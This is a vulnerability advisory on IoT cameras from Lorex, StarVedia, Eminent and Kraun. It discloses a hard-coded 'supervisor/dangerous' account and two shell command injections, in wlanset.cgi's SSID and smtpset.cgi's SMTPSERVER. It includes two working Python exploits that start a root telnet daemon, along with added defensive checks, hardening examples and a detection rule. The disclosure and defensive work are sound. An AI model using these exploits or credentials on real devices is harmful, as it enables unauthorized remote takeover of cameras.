SSD Advisory – Multiple IoT Vendors – Multiple Vulnerabilities

Vulnerabilities summary
The following advisory describes three (3) vulnerabilities found in products from the following vendors:

  • Lorex
  • StarVedia
  • Eminent
  • Kraun

The vulnerabilities found:

  • Hard-coded credentials
  • Remote command injection (2)

It is possible to chain the vulnerabilities: the hard-coded account satisfies the authentication check on the vulnerable CGI scripts, so either command injection yields remote command execution without any device-specific credentials (the proofs of concept below log in with the default account).
Credit
An independent security researcher, Robert Kugler (https://www.s3cur3.it), has reported these vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
We tried to contact Lorex, Kraun and Eminent; the attempts to establish contact went unanswered, so no details on a solution or a workaround are available for their products.
StarVedia were informed of the vulnerabilities and released patches to address them – “These two issues were fixed before your contacting us”

Vulnerabilities details
Hard-coded credentials
A default account that can be used to log in to the device’s web interface is “supervisor”, with the password “dangerous”. The web interface uses HTTP Basic authentication, and the proofs of concept below send this account in the Authorization header.
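As an added example (not part of the original advisory), a check for whether a device still honours the default account. It first sends a password that cannot be right, so that a device which accepts anything is not misreported as “accepts the default password”. The probed path (“/”) and the status codes (401 for a refused login, 2xx for an accepted one) are assumptions; the transport is injectable so the logic can be exercised without a device.

```python
import base64
import urllib.error
import urllib.request

# Default account reported in the advisory.
DEFAULT_USER = "supervisor"
DEFAULT_PASSWORD = "dangerous"


def basic_auth_header(user, password):
    """Return the HTTP Basic 'Authorization' value for user:password."""
    token = base64.b64encode(f"{user}:{password}".encode("ascii")).decode("ascii")
    return "Basic " + token


def http_get_status(url, headers, timeout):
    """Default transport: GET the URL and return the HTTP status code."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


def check_default_credentials(base_url, get_status=http_get_status, timeout=5):
    """Classify how the device's web interface treats the default account.

    Returns one of:
      "auth_not_enforced" - an obviously wrong password is accepted, so a
                            default-credential probe would prove nothing
      "default_accepted"  - supervisor/dangerous logs in (the advisory's finding)
      "rejected"          - the default account is refused
    Assumes (not stated by the advisory) that the landing page "/" is protected,
    that a refused login answers 401 and an accepted one answers 2xx.
    """
    url = base_url.rstrip("/") + "/"

    # Sanity probe with a password that cannot be right.
    bogus = {"Authorization": basic_auth_header(DEFAULT_USER, "not-the-password")}
    if get_status(url, bogus, timeout) != 401:
        return "auth_not_enforced"

    # Real probe with the hard-coded account.
    default = {"Authorization": basic_auth_header(DEFAULT_USER, DEFAULT_PASSWORD)}
    if 200 <= get_status(url, default, timeout) < 300:
        return "default_accepted"
    return "rejected"


if __name__ == "__main__":
    import sys
    # usage: python3 check_default_creds.py http://192.0.2.1  (TEST-NET address, not a real device)
    print(check_default_credentials(sys.argv[1]))
```

Running this against a device you own is the quickest way to confirm whether a firmware update actually removed the account rather than merely hiding it from the user-management page.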
Remote command injection (1)
User-controlled input is not sufficiently filtered, allowing an attacker to inject arbitrary commands by sending a POST request to /cgi-bin/wlanset.cgi with a malicious ‘SSID’ parameter. The value evidently reaches a shell on the device, since the backtick command substitution used in the proof of concept below is executed and starts a telnet daemon.
Proof of Concept

#!/usr/bin/env python3
# PoC: command injection in the 'SSID' parameter of wlanset.cgi, authenticated
# with the hard-coded supervisor/dangerous account. Spawns telnetd on the device.
import time
import requests
url = 'http://VICTIM-IP/cgi-bin/wlanset.cgi'  # Adjust IP address
# The SSID value is evaluated by a shell on the device; the backticks run telnetd.
payload = {
    'WiFiEnable': '1',
    'SSID': '`/bin/busybox telnetd`',
    'SECUNONE': '1',
    'WIFITEST': 'WiFi test',  # sent form-encoded as WIFITEST=WiFi+test
}
print("Unauthenticated Remote Code Execution")
# requests builds the Basic Authorization header for supervisor:dangerous itself
r = requests.post(url, data=payload, auth=('supervisor', 'dangerous'), timeout=10)
print("HTTP status:", r.status_code)
time.sleep(5)
print("\nTry to connect to your target via telnet and use the user name root.")

Remote command injection (2)
User-controlled input is not sufficiently filtered, allowing an attacker to inject arbitrary commands by sending a POST request to /cgi-bin/smtpset.cgi with a malicious ‘SMTPSERVER’ parameter. As with the SSID parameter, the value reaches a shell, so the backtick command substitution in the proof of concept below is executed on the device.
Proof of Concept

#!/usr/bin/env python3
# PoC: command injection in the 'SMTPSERVER' parameter of smtpset.cgi, authenticated
# with the hard-coded supervisor/dangerous account. Spawns telnetd on the device.
import time
import requests
url = 'http://VICTIM-IP/cgi-bin/smtpset.cgi'  # Adjust IP address
# The SMTPSERVER value is evaluated by a shell on the device; the backticks run telnetd.
payload = {
    'UseUserDefined': '1',
    'SMTPSERVER': '`/bin/busybox telnetd`',
    'SMTPPORT': '25',
    'SMTPNAME': '',
    'SMTPPASSWD': '',
    'SMTPTEST': 'SMTP server test',  # sent form-encoded as SMTPTEST=SMTP+server+test
}
print("Unauthenticated Remote Code Execution")
# requests builds the Basic Authorization header for supervisor:dangerous itself
r = requests.post(url, data=payload, auth=('supervisor', 'dangerous'), timeout=10)
print("HTTP status:", r.status_code)
time.sleep(5)
print("\nTry to connect to your target via telnet and use the user name root.")
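Both injections are the same bug class, so one added example (not the advisory’s code and not the vendors’ firmware) covers both. It shows why the backtick payload works when a parameter is spliced into a string handed to /bin/sh, why the same value is inert when passed as its own argv element (or quoted with shlex.quote if a shell string is unavoidable), and a detection rule over form-encoded POST bodies to the two CGIs. The iwconfig argv, the SSID length rule and the sample request bodies are assumptions and constructed input; the actual command the device runs is not known from the advisory.

```python
import re
import shlex
import subprocess
from urllib.parse import parse_qs

# The two CGIs from the advisory: path -> parameter that reaches the shell.
INJECTABLE = {
    "/cgi-bin/wlanset.cgi": "SSID",
    "/cgi-bin/smtpset.cgi": "SMTPSERVER",
}
# Characters that let a value break out of a shell command string.
SHELL_META = re.compile(r"[`$;|&<>()\n\r]")


def run_vulnerable(value):
    """Run an echo through /bin/sh the way a vulnerable CGI would build its
    command: the shell evaluates backticks even inside double quotes."""
    cmd = 'echo "%s"' % value
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def run_hardened(value):
    """Same call with an argv list and no shell: the value is one argument
    and is never parsed for metacharacters."""
    return subprocess.run(["echo", value], capture_output=True, text=True).stdout.strip()


def validate_ssid(ssid):
    """Structural check only (1-32 bytes, no control characters; assumed rule).
    Deliberately not a character allowlist: real SSIDs contain punctuation,
    so safety must come from how the value is passed, not from rejecting
    'odd' names."""
    raw = ssid.encode("utf-8")
    return 1 <= len(raw) <= 32 and not any(b < 0x20 or b == 0x7F for b in raw)


def hardened_argv(ssid):
    """Build the argv for an assumed 'iwconfig wlan0 essid <ssid>' call.
    Backticks in ssid are harmless here: there is no shell to interpret them."""
    if not validate_ssid(ssid):
        raise ValueError("invalid SSID")
    return ["iwconfig", "wlan0", "essid", ssid]


def shell_safe_command(ssid):
    """If a shell string is unavoidable, quote the value: shlex.quote wraps it
    in single quotes, inside which backticks and $(...) are literal."""
    return "iwconfig wlan0 essid " + shlex.quote(ssid)


def flag_request(path, body):
    """Detection over a form-encoded POST body: return (param, value) when the
    injectable parameter of one of the two CGIs carries shell metacharacters."""
    param = INJECTABLE.get(path)
    if param is None:
        return None
    for value in parse_qs(body, keep_blank_values=True).get(param, []):
        if SHELL_META.search(value):
            return (param, value)
    return None


# Constructed sample bodies: the advisory's payloads as a browser or requests
# would form-encode them (backtick -> %60, '/' -> %2F, space -> +), plus a benign one.
SAMPLE_REQUESTS = [
    ("/cgi-bin/wlanset.cgi",
     "WiFiEnable=1&SSID=%60%2Fbin%2Fbusybox+telnetd%60&SECUNONE=1&WIFITEST=WiFi+test"),
    ("/cgi-bin/smtpset.cgi",
     "UseUserDefined=1&SMTPSERVER=%60%2Fbin%2Fbusybox+telnetd%60&SMTPPORT=25"),
    ("/cgi-bin/wlanset.cgi", "WiFiEnable=1&SSID=HomeNet-5G&SECUNONE=1"),
]

if __name__ == "__main__":
    for path, body in SAMPLE_REQUESTS:
        print(path, "->", flag_request(path, body))
    print(run_vulnerable("`echo INJECTED`"))  # INJECTED
    print(run_hardened("`echo INJECTED`"))    # `echo INJECTED`
```

The detection deliberately decodes the body with parse_qs before matching: the advisory’s payload arrives as %60%2Fbin%2Fbusybox+telnetd%60, so a pattern run over the raw body would miss the backticks. The same rule can be pointed at smtpset.cgi’s other fields (SMTPNAME, SMTPPASSWD) if they turn out to reach the shell as well, but the advisory only names SMTPSERVER.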